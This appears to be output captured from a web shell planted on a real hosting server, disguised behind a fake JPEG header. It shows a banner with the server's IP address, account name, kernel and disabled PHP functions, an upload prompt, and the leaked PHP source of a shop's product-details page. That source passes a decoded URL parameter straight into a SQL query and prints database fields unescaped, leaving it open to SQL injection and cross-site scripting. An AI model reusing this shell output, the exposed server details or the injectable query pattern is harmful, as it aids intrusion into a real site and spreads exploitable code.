���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/jeevikagaumaa.in/public_html/ |
Upload File : |
<?php session_start(); include './action/config.php'; $id2 = base64_decode($_GET['id']); $sql6 = "SELECT * FROM `product` WHERE id='$id2' "; $qr6 = mysqli_query($con, $sql6); $pr6 = mysqli_fetch_array($qr6); $category = $pr6['category']; $defaultImage = "assets/img/favicon2.png"; $imagePath = $path . $pr6['img1']; if (!file_exists($imagePath) || empty($pr6['img1'])) { $imagePath = $defaultImage; } ?> <!DOCTYPE html> <html lang="en" data-bs-theme="light"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="<?= $pr6['pname'] . '-' . $pr6['quantity'] ?> <?= $shop['name'] ?>"> <meta name="author" content=""> <meta name="keywords" content=""> <link rel="icon" href="assets/img/favicon.png" type="image/png" sizes="16x16"> <title><?= $pr6['pname'] . '-' . $pr6['quantity'] ?> <?= $shop['name'] ?></title> <link rel="stylesheet" href="assets/css/main.css"> </head> <body> <div class="main-wrapper"> <?php include './header.php'; ?> <!--breadcrumb section start--> <div class="gstore-breadcrumb position-relative z-1 overflow-hidden mt--50"> <img src="assets/img/shapes/bg-shape-6.png" alt="bg-shape" class="position-absolute start-0 z--1 w-100 bg-shape"> <img src="assets/img/shapes/pata-xs.svg" alt="pata" class="position-absolute pata-xs z--1 vector-shape"> <img src="assets/img/shapes/onion.png" alt="onion" class="position-absolute z--1 onion start-0 top-0 vector-shape"> <img src="assets/img/shapes/frame-circle.svg" alt="frame circle" class="position-absolute z--1 frame-circle vector-shape"> <img src="assets/img/shapes/leaf.svg" alt="leaf" class="position-absolute z--1 leaf vector-shape"> <img src="assets/img/shapes/garlic-white.png" alt="garlic" class="position-absolute z--1 garlic vector-shape"> <img src="assets/img/shapes/roll-1.png" alt="roll" class="position-absolute z--1 roll vector-shape"> <img src="assets/img/shapes/roll-2.png" alt="roll" class="position-absolute z--1 roll-2 vector-shape"> <img src="assets/img/shapes/pata-xs.svg" alt="roll" class="position-absolute z--1 pata-xs-2 vector-shape"> <img src="assets/img/shapes/tomato-half.svg" alt="tomato" class="position-absolute z--1 tomato-half vector-shape"> <img src="assets/img/shapes/tomato-slice.svg" alt="tomato" class="position-absolute z--1 tomato-slice vector-shape"> <img src="assets/img/shapes/cauliflower.png" alt="tomato" class="position-absolute z--1 cauliflower vector-shape"> <img src="assets/img/shapes/leaf-gray.png" alt="tomato" class="position-absolute z--1 leaf-gray vector-shape"> <div class="container"> <div class="row"> <div class="col-12"> <div class="breadcrumb-content"> <h2 class="mb-2 text-center"><?= $pr6['pname'] ?></h2> <nav> <ol class="breadcrumb justify-content-center"> <li class="breadcrumb-item fw-bold" aria-current="page"><a href="./">Home</a></li> <li class="breadcrumb-item fw-bold" aria-current="page"><a href="./shop?p=1&category=<?= $pr6['category'] ?>"><?= $pr6['category'] ?></a></li> <li class="breadcrumb-item fw-bold" aria-current="page"><?= $pr6['pname'] ?></li> </ol> </nav> </div> </div> </div> </div> </div> <!--breadcrumb section end--> <!--product details start--> <section class="product-details-area ptb-120"> <div class="container"> <div class="row g-4"> <div class="col-xl-9"> <div class="product-details"> <div class="gstore-product-quick-view bg-white rounded-3 py-6 px-4"> <div class="row align-items-center g-4"> <div class="col-xl-6 align-self-end"> <div class="quickview-double-slider"> <div class="quickview-product-slider swiper"> <div class="swiper-wrapper"> <div class="swiper-slide text-center"> <img src="<?= $imagePath ?>" alt="<?= $pr6['pname'] . '-' . $pr6['quantity'] ?>" class="img-fluid"> </div> </div> </div> </div> </div> <div class="col-xl-6"> <div class="product-info"> <h4 class="mt-1 mb-3"><?= $pr6['pname'] ?></h4> <div class="pricing mt-2"> <span class="fw-bold fs-xs text-danger"><i class="fa fa-inr"></i> <?= ($pr6['deal_price'] > 0 ? $pr6['deal_price'] : $pr6['offer_price']) ?></span> <span class="fw-bold fs-xs deleted ms-1"><i class="fa fa-inr"></i> <?= ($pr6['deal_price'] > 0 ? $pr6['offer_price'] : $pr6['deal_price']) ?></span> </div> <h6 class="fs-md mb-2 mt-3">Weight:</h6> <ul class="product-radio-btn mb-4 d-flex align-items-center gap-2"> <li> <input type="radio" name="weight" value="<?= $pr6['quantity'] ?>" checked> <label><?= $pr6['quantity'] ?></label> </li> </ul> <div class="d-flex align-items-center gap-4 flex-wrap"> <div class="cart-buttons" id="cart-buttons-<?= $pr6['id'] ?>" data-product-id="<?= $pr6['id'] ?>"> <button style="width:100%" class="btn btn-secondary d-block btn-md add-to-cart-button" data-product-id="<?= $pr6['id'] ?>" data-product-name="<?= $pr6['pname'] . ' - ' . $pr6['quantity'] ?>" data-product-price="<?= $pr6['offer_price'] ?>" data-product-img="<?= $path . $pr6['img1'] ?>"><span class="me-2"><i class="fa-solid fa-bag-shopping"></i></span> Add to Cart</button> </div> </div> </div> </div> </div> </div> <div class="product-info-tab bg-white rounded-2 overflow-hidden pt-6 mt-4"> <ul class="nav nav-tabs border-bottom justify-content-center gap-5 pt-info-tab-nav"> <li><a href="#description" class="active" data-bs-toggle="tab">Description</a></li> </ul> <div class="tab-content"> <div class="tab-pane fade show active px-4 py-5" id="description"> <h6 class="mb-2">Details:</h6> <p class="mb-4"><?= $pr6['description'] ?></p> </div> </div> </div> </div> </div> <div class="col-xl-3 col-lg-6 col-md-8"> <div class="gshop-sidebar"> <div class="sidebar-widget info-sidebar bg-white rounded-3 py-3"> <div class="sidebar-info-list d-flex align-items-center gap-3 p-4"> <span class="icon-wrapper d-inline-flex align-items-center justify-content-center rounded-circle text-primary"> <i class="fa-solid fa-truck-fast"></i> </span> <div class="info-right"> <h6 class="mb-1 fs-md">Safe Shipping</h6> <span class="fw-medium fs-xs">For every orders</span> </div> </div> <div class="sidebar-info-list d-flex align-items-center gap-3 p-4 border-top"> <span class="icon-wrapper d-inline-flex align-items-center justify-content-center rounded-circle text-primary"> <i class="fas fa-inr"></i> </span> <div class="info-right"> <h6 class="mb-1 fs-md">100% Money Back</h6> <span class="fw-medium fs-xs">Guaranteed Product Warranty</span> </div> </div> <div class="sidebar-info-list d-flex align-items-center gap-3 p-4 border-top"> <span class="icon-wrapper d-inline-flex align-items-center justify-content-center rounded-circle text-primary"> <i class="fa-regular fa-heart"></i> </span> <div class="info-right"> <h6 class="mb-1 fs-md">Safety & Secure</h6> <span class="fw-medium fs-xs">Call us Anytime & Anywhere</span> </div> </div> </div> <div class="sidebar-widget banner-widget mt-4 p-0 border-0"> <div class="vertical-banner text-center bg-white rounded-2" data-background="assets/img/banner/banner-4.jpg" style="background-image: url(_assets/img/banner/banner-4.html);"> <h5 class="mb-1">Fresh & Organic Spice</h5> <div class="d-flex align-items-center justify-content-center gap-2"> <span class="hot-badge bg-danger fw-bold fs-xs position-relative text-white">HOT</span> <span class="offer-title text-danger fw-bold">50% Off</span> </div> <a href="./shop?p=1" class="explore-btn text-primary fw-bold">Shop Now<span class="ms-2"><i class="fas fa-arrow-right"></i></span></a> </div> </div> </div> </div> </div> </div> </section> <!--product details end--> <!--trending products start--> <section class="pt-8 pb-100 bg-white position-relative overflow-hidden z-1 trending-products-area"> <img src="assets/img/shapes/garlic.png" alt="garlic" class="position-absolute garlic z--1" data-parallax='{"y": 100}'> <img src="assets/img/shapes/carrot.png" alt="carrot" class="position-absolute carrot z--1" data-parallax='{"y": -100}'> <img src="assets/img/shapes/mashrom.png" alt="mashrom" class="position-absolute mashrom z--1" data-parallax='{"x": 100}'> <div class="container"> <div class="row align-items-center"> <div class="col-xl-5"> <div class="section-title text-center text-xl-start"> <h3 class="mb-0">Top Trending Products</h3> </div> </div> <div class="col-xl-7"> <div class="filter-btns gshop-filter-btn-group text-center text-xl-end mt-4 mt-xl-0"> <button class="active" data-filter="*"><a href="shop?p=1" class="text-secondary">All Products</a></button> </div> </div> </div> <div class="row justify-content-center g-4 mt-5 filter_group"> <?php $sql = "SELECT * FROM `product` WHERE status=1 order by rand() LIMIT 4"; $qr = mysqli_query($con, $sql); while ($pr = mysqli_fetch_array($qr)) : ?> <div class="col-xxl-3 col-lg-4 col-md-6 col-sm-10 filter_item beans_peas"> <div class="vertical-product-card rounded-2 position-relative"> <?php if ($pr['disc'] > 0) { ?> <span class="offer-badge text-white fw-bold fs-xxs bg-danger position-absolute start-0 top-0"><?= $pr['disc'] ?>% Cashback</span> <?php } ?> <div class="thumbnail position-relative text-center p-4"> <a href="product-details?id=<?= base64_encode($pr['id']) ?>"><img style="height: 150px" src="<?= $path . $pr['img1'] ?>" alt="apple" class="img-fluid"></a> </div> <div class="card-content"> <a href="shop" class="mb-2 d-inline-block text-secondary fw-semibold fs-xxs">Fresh Organic</a> <a href="product-details?id=<?= base64_encode($pr['id']) ?>" class="card-title fw-bold d-block mb-2"><?= substr($pr['pname'], 0, 18) . ' ' . $pr['quantity'] ?></a> <h6 class="price text-danger mb-3"><i class="fa fa-inr"></i> <?= $pr['offer_price'] ?></h6> <div class="cart-buttons" id="cart-buttons-<?= $pr['id'] ?>" data-product-id="<?= $pr['id'] ?>"> <button style="width:100%" class="btn btn-primary d-block btn-md add-to-cart-button" data-product-id="<?= $pr['id'] ?>" data-product-name="<?= $pr['pname'] . ' - ' . $pr['quantity'] ?>" data-product-price="<?= $pr['offer_price'] ?>" data-product-img="<?= $path . $pr['img1'] ?>">Add to Cart</button> </div> </div> </div> </div> <?php endwhile; ?> </div> </div> </section> <?php include './footer.php'; ?> </body> </html>